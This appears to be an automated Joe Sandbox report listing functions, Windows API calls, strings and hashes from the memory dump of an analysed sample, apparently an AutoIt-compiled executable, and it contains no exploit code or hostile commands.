_free.LIBCMT ref: 0080DA96

Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0

_free.LIBCMT ref: 0080DAB8
_free.LIBCMT ref: 0080DACD
_free.LIBCMT ref: 0080DAD8
_free.LIBCMT ref: 0080DAFA
_free.LIBCMT ref: 0080DB0D
_free.LIBCMT ref: 0080DB1B
_free.LIBCMT ref: 0080DB26
_free.LIBCMT ref: 0080DB5E
_free.LIBCMT ref: 0080DB65
_free.LIBCMT ref: 0080DB82
_free.LIBCMT ref: 0080DB9A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d221aaea8a0face14a1d2a030a8561422508190393d076870cf9c1a97118f098
Instruction ID: 4b3e038c37f3947ddf00c883df644e602c62581836cf3f487601a93a895efe1b
Opcode Fuzzy Hash: d221aaea8a0face14a1d2a030a8561422508190393d076870cf9c1a97118f098
Instruction Fuzzy Hash: 48314A326043059FEBA1AAB9EC49F6A7BE9FF00320F654429E449D71D1DB75EC40CB21

Function 0083365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0083369C
_wcslen.LIBCMT ref: 008336A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00833797
GetClassNameW.USER32(?,?,00000400), ref: 0083380C
GetDlgCtrlID.USER32(?), ref: 0083385D
GetWindowRect.USER32(?,?), ref: 00833882
GetParent.USER32(?), ref: 008338A0
ScreenToClient.USER32(00000000), ref: 008338A7
GetClassNameW.USER32(?,?,00000100), ref: 00833921
GetWindowTextW.USER32(?,?,00000400), ref: 0083395D

Strings

%s%u, xrefs: 00833734

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 5ead09ff47f3c2032c53925cef5c31b1d4a469c3c162f142a319279fb9127bef
Instruction ID: 7d31e5716ee9d982b44fb3ef6930f71ad187e797cca2bdb9b330812d55d73cd0
Opcode Fuzzy Hash: 5ead09ff47f3c2032c53925cef5c31b1d4a469c3c162f142a319279fb9127bef
Instruction Fuzzy Hash: BA91B371204606EFD719DF24C885BBAF7A8FF84350F008629FA99C6190DB70EA45CBD1

Function 00834954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00834994
GetWindowTextW.USER32(?,?,00000400), ref: 008349DA
_wcslen.LIBCMT ref: 008349EB
CharUpperBuffW.USER32(?,00000000), ref: 008349F7
_wcsstr.LIBVCRUNTIME ref: 00834A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00834A64
GetWindowTextW.USER32(?,?,00000400), ref: 00834A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00834AE6
GetClassNameW.USER32(?,?,00000400), ref: 00834B20
GetWindowRect.USER32(?,?), ref: 00834B8B

Strings

ThumbnailClass, xrefs: 00834A6F, 00834AF1

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: d0ee00f1836bd7f91a8f263c93d3f66fa724178dd44e0f5b09d10ceb4907add1
Instruction ID: fbdacc9a1dfcc3554b3f169564b21094c55187747c021e7e2f253e13833de065
Opcode Fuzzy Hash: d0ee00f1836bd7f91a8f263c93d3f66fa724178dd44e0f5b09d10ceb4907add1
Instruction Fuzzy Hash: C091DC710042099FDB04DF54C885BBABBE8FF84314F04A46AFE85DA196EB74ED45CBA1

Function 00868D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00868D5A
GetFocus.USER32 ref: 00868D6A
GetDlgCtrlID.USER32(00000000), ref: 00868D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00868E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00868ECF
GetMenuItemCount.USER32(?), ref: 00868EEC
GetMenuItemID.USER32(?,00000000), ref: 00868EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00868F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00868F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00868FA1

Strings

0, xrefs: 00868E9F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 693a44f3feed439403613f786324cc494bb8d815b0fe694becbaf98f2da0b743
Instruction ID: 2f2613ea3b55bd6f18c3e242e0233290a3aa51b55389f7e229f10311f364aad0
Opcode Fuzzy Hash: 693a44f3feed439403613f786324cc494bb8d815b0fe694becbaf98f2da0b743
Instruction Fuzzy Hash: 1281AF71508305DFDB10CF14D889A6B7BE9FB88314F060A19F989D7291DF71D900CBA2

Function 0083DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0083DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0083DC46
_wcslen.LIBCMT ref: 0083DC50
_wcsstr.LIBVCRUNTIME ref: 0083DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0083DCBC

Strings

%u.%u.%u.%u, xrefs: 0083DD9A
04090000, xrefs: 0083DCF2
StringFileInfo\, xrefs: 0083DC8F
DefaultLangCodepage, xrefs: 0083DD1F
\VarFileInfo\Translation, xrefs: 0083DCB4

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 88ae5c6f278ce7062a61613462bca88a4b8dd2cd84c1e8a662fb99c89c2d53b5
Instruction ID: c28f278cff871c2f633b12fd5e992500fafa93213fc5efc9c0ee6883652dd882
Opcode Fuzzy Hash: 88ae5c6f278ce7062a61613462bca88a4b8dd2cd84c1e8a662fb99c89c2d53b5
Instruction Fuzzy Hash: 4E412872940309BBDB14A775DC0BEBF376CFF46750F14006AFA00E6282EB79A90197A5

Function 0085CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0085CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0085CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0085CD48

Part of subcall function 0085CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0085CCAA
Part of subcall function 0085CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0085CCBD
Part of subcall function 0085CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0085CCCF
Part of subcall function 0085CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0085CD05
Part of subcall function 0085CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0085CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0085CCF3

Strings

advapi32.dll, xrefs: 0085CCB8
RegDeleteKeyExW, xrefs: 0085CCC9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 9e2a95480fdcaa9885983e7d63e96ad25af08737e6d715315ee68a1dc68cf28d
Instruction ID: 14c1d695c5ce99c27acdb39cd2e002496f074bc446835827eeb9381fa4f3eaa5
Opcode Fuzzy Hash: 9e2a95480fdcaa9885983e7d63e96ad25af08737e6d715315ee68a1dc68cf28d
Instruction Fuzzy Hash: 06318C75901228BFDB219B94DC88EFFBB7CFF06741F010165F906E2240DAB49E499AA0

Function 0083E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0083E6B4

Part of subcall function 007EE551: timeGetTime.WINMM(?,?,0083E6D4), ref: 007EE555

Sleep.KERNEL32(0000000A), ref: 0083E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0083E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0083E727
SetActiveWindow.USER32 ref: 0083E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0083E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0083E773
Sleep.KERNEL32(000000FA), ref: 0083E77E
IsWindow.USER32 ref: 0083E78A
EndDialog.USER32(00000000), ref: 0083E79B

Strings

BUTTON, xrefs: 0083E719

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b55a1d3a6a7057c5d13d21e3115f3db29c71dc2ae08df7c2f7b812997c3567e4
Instruction ID: 175bf9790af69dd8304b2f357a1c267277790549e9e24ca79848b85cf5cbfa46
Opcode Fuzzy Hash: b55a1d3a6a7057c5d13d21e3115f3db29c71dc2ae08df7c2f7b812997c3567e4
Instruction Fuzzy Hash: 33219670240205AFFF219FA4EC9DA353B69F7A6348F111425F556C2AF1DBB59C00CBA5

Function 0083E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0083EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0083EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0083EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0083EAA7

Strings

open , xrefs: 0083EA0C
close PlayMe, xrefs: 0083EA6E, 0083EA9B
alias PlayMe, xrefs: 0083EA36
play PlayMe, xrefs: 0083EAA2
status PlayMe mode, xrefs: 0083EA58
play PlayMe wait, xrefs: 0083EA91

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: ea606c14962d11e0cd34857354acce400d3e372deae2dc6805def4b212e993d5
Instruction ID: 95da710c978e6f1ee2f2972417a033ef489e474060e08dfe7748a106b9258026
Opcode Fuzzy Hash: ea606c14962d11e0cd34857354acce400d3e372deae2dc6805def4b212e993d5
Instruction Fuzzy Hash: 2A115131A50269B9DB20B7A2DC4AEFF6E7CFBD1B40F04042AB411E22D1EEB45915C5B0

Function 00835CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00835CE2
GetWindowRect.USER32(00000000,?), ref: 00835CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00835D59
GetDlgItem.USER32(?,00000002), ref: 00835D69
GetWindowRect.USER32(00000000,?), ref: 00835D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00835DCF
GetDlgItem.USER32(?,000003E9), ref: 00835DDD
GetWindowRect.USER32(00000000,?), ref: 00835DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00835E31
GetDlgItem.USER32(?,000003EA), ref: 00835E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00835E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00835E67

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: eb930f8fbe14ddf71682072492023bab73fb406c445b06f6049530c193cd89db
Instruction ID: c70fb6daa0da91ce537c15b88a291d9e20177730b9385de4fba561dce0c86dd0
Opcode Fuzzy Hash: eb930f8fbe14ddf71682072492023bab73fb406c445b06f6049530c193cd89db
Instruction Fuzzy Hash: 495110B1B00605AFDF18CF68DD89AAE7BB5FB88301F558129F515E7290D7B49E00CB50

Function 007E8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 007E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007E8BE8,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8FC5

DestroyWindow.USER32(?), ref: 007E8C81
KillTimer.USER32(00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00826973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 008269A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 008269B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000), ref: 008269D4
DeleteObject.GDI32(00000000), ref: 008269E6

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ce4813e779be7dfff67d03bbcde79955a7378a27f358ef98429ce0445c189b81
Instruction ID: ca2b1168db82a0174d3510e389dcf30b963c4c11a73c8fa0288a957dbf85e861
Opcode Fuzzy Hash: ce4813e779be7dfff67d03bbcde79955a7378a27f358ef98429ce0445c189b81
Instruction Fuzzy Hash: F461BE30102650DFDF619F16D948B26BBF1FB4A312F24555DE0869AA70CB79ACD0CFA2

Function 007E9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952

GetSysColor.USER32(0000000F), ref: 007E9862

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 0f883cf01d25103500c3fdbb187ae1f9fe6983222ca476ecc630375453c3185e
Instruction ID: da79323291d0be51a6d9988239b6d14c985bd7c412f466db0a9c3e5edd1e6146
Opcode Fuzzy Hash: 0f883cf01d25103500c3fdbb187ae1f9fe6983222ca476ecc630375453c3185e
Instruction Fuzzy Hash: 9E41B032105690AFDB205F3A9C88BB93BA5FB1A330F155615FAA2872F2D7749C81DB11

Function 008396E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0081F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00839717
LoadStringW.USER32(00000000,?,0081F7F8,00000001), ref: 00839720

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0081F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00839742
LoadStringW.USER32(00000000,?,0081F7F8,00000001), ref: 00839745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00839866

Strings

Error: , xrefs: 0083981D
Line %d (File "%s"):, xrefs: 0083978F
^ ERROR, xrefs: 008397FB
%s (%d) : ==> %s: %s %s, xrefs: 0083984A
Line %d:, xrefs: 008397A0

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 2c48b7c1cab07585c34e112fb9e67ea6f9d7b0b9ab3631a0cd4aec2a689c55f8
Instruction ID: 1a4cbf73a3bdd75224209cfdc44eb698016c8f903b5bac14958710e7c5e77426
Opcode Fuzzy Hash: 2c48b7c1cab07585c34e112fb9e67ea6f9d7b0b9ab3631a0cd4aec2a689c55f8
Instruction Fuzzy Hash: D2414172900119AADF04FBE4DE4ADEEB778FF55740F100026F605B2191EA796F58CBA1

Function 008306DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008307A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008307BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008307DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00830804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0083082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00830837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0083083C

Strings

\CLSID, xrefs: 00830724
SOFTWARE\Classes\, xrefs: 0083070E
\IPC$, xrefs: 00830784

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 6673133792f12e1cd62272f549516f8b45f4d5ff9cbd6ceb09c9dd00b3ee848e
Instruction ID: c95c492da6b15afcd84ac6fc3dad4858a91e89ff8d086e75beb49a44e28b4ba9
Opcode Fuzzy Hash: 6673133792f12e1cd62272f549516f8b45f4d5ff9cbd6ceb09c9dd00b3ee848e
Instruction Fuzzy Hash: AF411872C10229EBDF11EBA4DC999EDB778FF44750F05416AE901A32A1EB749E04CF90

Function 00853C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00853C5C
CoInitialize.OLE32(00000000), ref: 00853C8A
CoUninitialize.OLE32 ref: 00853C94
_wcslen.LIBCMT ref: 00853D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00853DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00853ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00853F0E
CoGetObject.OLE32(?,00000000,0086FB98,?), ref: 00853F2D
SetErrorMode.KERNEL32(00000000), ref: 00853F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00853FC4
VariantClear.OLEAUT32(?), ref: 00853FD8

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

